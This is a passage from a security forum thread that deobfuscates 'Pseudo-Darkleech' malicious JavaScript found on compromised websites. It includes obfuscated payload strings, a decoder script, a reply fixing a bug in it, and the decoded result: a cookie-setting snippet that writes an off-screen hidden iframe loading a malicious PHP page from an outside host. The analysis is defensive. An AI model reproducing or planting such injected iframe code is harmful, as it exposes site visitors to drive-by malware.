110 1r2b5 37 g113 117- 121 127 12b5 72 121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
for (i=0;i<a.length;i++) a[i]=parseInt(a[i])^x;
s=String.fromCharCode.apply(null,a);
 if (s.indexOf('MSIE')>0) break;
}

re = /="([^"]+)"/;
str=re.exec(s)[1];

imagePackage=0;
 
  onclickGetClass=2;
 
 documentEmbed=str;
 parseFloatOndragdrop=undefinedNew;
 statusAll=switchNative=imagePackage;
 passwordElements="";
 parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");
 for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++)
 {
   packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);
   if(statusAll%onclickGetClass)
   {
     passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);
     switchNative++;
   }
   else
   {
     onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;
   }
   statusAll++;
 }
document.getElementById('output').value = passwordElements;
</script>


You will get the fully decoded result:

Code: [Select]
c="PHP_SESSION_PHP=221; path=/; expires="+new Date(new Date().getTime()+604800000).toUTCString();document.cookie=c;document.cookie="_"+c;document.write('<style>.bdqrwvmnggd{position:absolute;top:-633px;width:300px;height:300px;}</style><div class="bdqrwvmnggd"><iframe src="http://vandre.lilachillsranchhomes.com/QUwKWbAeqS_tw_vDFzVk.php" width="250" height="250"></iframe></div>');
Now we have a semi-automated solution for decoding current Pseudo-Darkleech version. All you need to do is replacing the content of "undefinedNew" by the
content of html section on top of the page from other compromised sites. Feel free to modify the code in a way that this content can be pasted into the textarea.
Ruining the bad guy's day

April 25, 2016, 11:43:52 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I learned that

s=String.fromCharCode.apply(null,a);

for converting the array to a string doesn't work reliably. For this reason I modified the code for stage 1 to this:

Code: [Select]
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
s="";
for (i=0;i<a.length;i++) s+=String.fromCharCode(parseInt(a[i])^x);
 if (s.indexOf('MSIE')>0) break;
}

Complete code:
Code: [Select]
<TEXTAREA id="output" ROWS=25 COLS=80></TEXTAREA>

<script>

undefinedNew="52 48 46 51 3c6 4j7 19 c40 55w 122a 11w-1 108 28a 48 4a6 41 35 40 aj4d-8 w1a05 52 46z 35b 34 37 38 53 2l6 b110- 108w 1a11fb -1e0b8 28 48 4o6 41c 3f5 e40 48 10p5a 36 47 5s3b 4neua0 42 34 a2-d6 va1p10 12b4 36 47 3v4 3a6 44 3-7 4q0 63 d19 62 pb5y.5 34bi 40;a 33c 12ad2 28d 101 g53b 4o-9 1a2z5c 118 1m18 101 -e107 1w01 10 2-0 14 2 101b- 10i7 26 124 3d3 40 5-3 11nb1 3p6 b43 40 52 34 -4d 43 38 5b2-c 52 12b2 52,z 48 46- d-v51 36 47a- 1i9 40 55a 1y24 d36 43 4p0 b-5o2 34a 4 43 p38 52 e52 12tcc3 36 4eb7 34 36 4c4 37 qehc4x0c- 6u3 e19 62 5t5- 3e-4 40 uc33 1-05 4u3 34 a41 n32 51 d47 p-1b24 -i36a 43 40 52 34 4 43u 38 52c 52 1-08n c108 110 6j0 4b6 33k 111d 41 38 49 4m6b 32 38y d-51 40 5ka3 105 50 52c 34 53 6 32 34b 41- 51k 105 46bka -41 35 va34 -t63ar 8 3ec3 c111 3x6 4c7 t3b4 36 44 kc3e7 40 6d3k 1b9 6j2 55 c3u4dn 4bm0 3c3 28 ia3z6 43a- 4b0 c52 3w4 4 c43 38 52 k52 26a 1u-10 121 52 4d8l b46kb n51 3c6r 47 19 40c 55j 1a10 60 36 g43 34 b38 -a53 bl19 46b 42 34 40- 50k 51 4 40 -41 52 5a1 12v2 36 47b f34 36 d44 37 40 63 1i9 62 55 3b4j 40 33c -1z05d 43 hb34 41 y3by2 51, 47d 10n6 3b6 43 4q0a da52 3-4 4 43 38 52b -5b2 1z2e4o a37- 5va3z 3cv4- 38 e44 124 p58 58d 4mamd6- 33v 1e11 41 3o8 4c9 q46 32ck 3c8 z51 40 53 1-05 50 52 34a 5c3 cl6 bp32 34 41-a 51 105 46v -41 35b 34 63 8 33 11ea1 101 1-0 d2-0 14 e2w 10c3 -118t, 1a1e9b g1c0fa1 11p0 1b21 u52a 48 4t6- 51 36 4bc7 1b9 4-0x 5b5 1l10 a60v c3y6 4a3 ,34k 38 53 19 46 42e 34 4v0 -c50t 5c1 4 40 4q1b 52 5oes1cv 1-08 108 124 58 55 38 32 esdl34 a30 8 33 33 g52 34 b51 -3 34i 36 4-0 caa35 34 18 21 14 4 40 4n2 55a tah40e 4j1 34a 41 t51 122 10d1 10pb 48 115m 23 dt6 115 1 49 50 17 10 dj38 49 126 b1q01 124a 49 -38 53x a15- 46 5g2 51 40 53 62 1b22 35 40l 36 50 42 -34 41 e5i1 1c0p5 32 3a4 51gc 2 u43 34 42 34 c41b 51 a5 62 1-a4 3c5t 111 b101 3jb-7 50 5i1d 51l 40 b41 0 3y4 51 4 4a3 38 q5a2 -52 1e01 11e0 m105 46 41 41 34 53 15- 19 10 11 e124 l4d8 47p.b 4f6 d43 34 r2 49 3-4 41 51 12c2 51 47 53 l40 a48 14 41 wd41l 3c4 -53 16 46b d35 5tc1 47 122 52tca 48 4-6 5a1 3v6c uem47b l1av9a 40 55 c1-c24 v4ep0-dk b4b1-b 42- 40 50 52jb ido34 4-b2 40 49v 34 a4 4m7ap- 34c 36 44 37 40l 63. 122 b-1j01 10ao1 d1k24d 49 i38 5bga3 15 4w-6 52 5csb1 40x 53 62 122c 49 38b 53 d1.o5 b46 pa5y2 d51 40 5n3 62 10c5 bbi53- 34 a5m5d 43 38 36 34 111l 1d04 28 25 38 1qbm06 61 2c6 10a4e p32 b107 101 101 110a-c 1-24ads 33 4a0o c53- 1h11 -36dm 43a 4s0 5-2 34 4 bd43 3a8e 52 -52cb 1d22 5v2 48 aibc46 b51b 36 47ahc 19 b40 55 1d24ua 36 i43 40c 5k2 34- b4 43 38 52x 52 123b db49-h -38 53c yb15b d4-6 t5aua2 51 40se 53 6k2 105b 43 e3aj4 -d41 32 51q e47 12b4 d3g6 dh43b 40 h5b2 34- k4af 4-3 38 a52 52c -108 108 110 60 40d 41d 44 34 62e 3i5 40d 48 41 1 46 41 h38 43a 12g2 49 38 53d 15x 46 e5j2- 51 40 a53w 62 105d 36 4-7yb 3-8 5e3, 4aq c4l0 35 b3q4 6 51 a111 36 -43j 40 5a2 34 -4 43 c38 52 52 a-110e 124 4eh6 3-3 1cr1a1 48 -47 46 b43 34 2 49 ds34d ,41v 51 98 36 43 3ak4 e38 s53dl 19 46b 4-2 34c 40bw -50 51c 4 40l 41aa b52 5b1 1d10 60 40 41 42 oe-l4c0 x5bb0 52 c34, 42 40 4a9b 3-o4 4 47co 34 ;3e6 q44d -3d7do 4e0 f63 b108 122 20wa 5cc,1 x53 4cv6dy-dh 4-1 3a2j 1dw0e5 33 5m3ane 40 42v -4 di47a 38 53 4 4f0c 35 34 d1c11 111-f 1-11 33 5aj3 c38 42 34xa- 5weo2 d11 -38 6j2d 3db4 5o3b 52 108 40 4x1 d44 34 6p2ca 3a5 40-t 48 41 1 46 41a 38 43 10g6 126 112ed 110 e25hc 5w5 a38y 32 :34d o30 8 3c3g 33d 5j2 e3i4 51bx 3 c34 -36b 40 -35 dd3e4g -18 2a1 14 4yaq -b40 4h2 5e5 40 41 34fb 41l 51a -x10c5 36z 47 38 bo53drb -4 40 de35 w34 6 51b 111 51 47 53- 40 4m-8 14 41 4d1 d34 53 16- 46 35 5by1b 47 98ib 55 3c8 32 34c 30 h8 33 33 5b2oc 34 51v 3d 34 ra3s6 e-t40 3c5 t34 18 2a1 1a4 4 40 42 55 40 ea41e 34 4-1j 51 1-a05 43ee 3o4 4cs1 32 51c 47r- e1-10 110 9x8 1d17 11va4 114v- 110 124a 51ze 47 e53 4a0 4z8 14- 4c1, a4d1 z34 5-3 b16 k46b 3z5d -51 47 108 108 12p4 58b 3o4 4a3- r52 3d4 60 p3e3 5x-eo3af 38 42 ,34a 5z2 .11 38 62 d34 53 5mc2 eba1d22d- ckc11-1b 4bab0l 41 4a4 34 62 35 40 48 41z 1 4b6a 41 38 c.j43 10b-6 ka126 112e 110c 10x9 11d8 1m1eo6- a1-09 36 43 34t 3d8 53 n19 46 42 -34 40b 50z 51c 4 4a0 41 52 5d1- lb124 58 4-8 j47 a46-y 43- 34 2 49 3a4 41b 51 108e 10q8 124 58 b28 u2a-o6 28 101 a36 4-z0 d41e 5bka2 s-51 53 a50j 3-ek6 5b1 -40 53 1e01 a26 28 101 36 40 4-1we f5a2 51 53 50 36 51 v40 d53 10-a1 26 111 40 41 42 40 50 52 34 42 40 49 34 4 47 34 36 44 37 40 63 110 111 110 124";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
s="";
for (i=0;i<a.length;i++) s+=String.fromCharCode(parseInt(a[i])^x);
 if (s.indexOf('MSIE')>0) break;
}

re = /="([^"]+)"/;
str=re.exec(s)[1];

imagePackage=0;
 
  onclickGetClass=2;
 
 documentEmbed=str;
 parseFloatOndragdrop=undefinedNew;
 statusAll=switchNative=imagePackage;
 passwordElements="";
 parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");
 for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++)
 {
   packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);
   if(statusAll%onclickGetClass)
   {
     passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);
     switchNative++;
   }
   else
   {
     onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;
   }
   statusAll++;
 }
document.getElementById('output').value = passwordElements;
</script>

Ruining the bad guy's day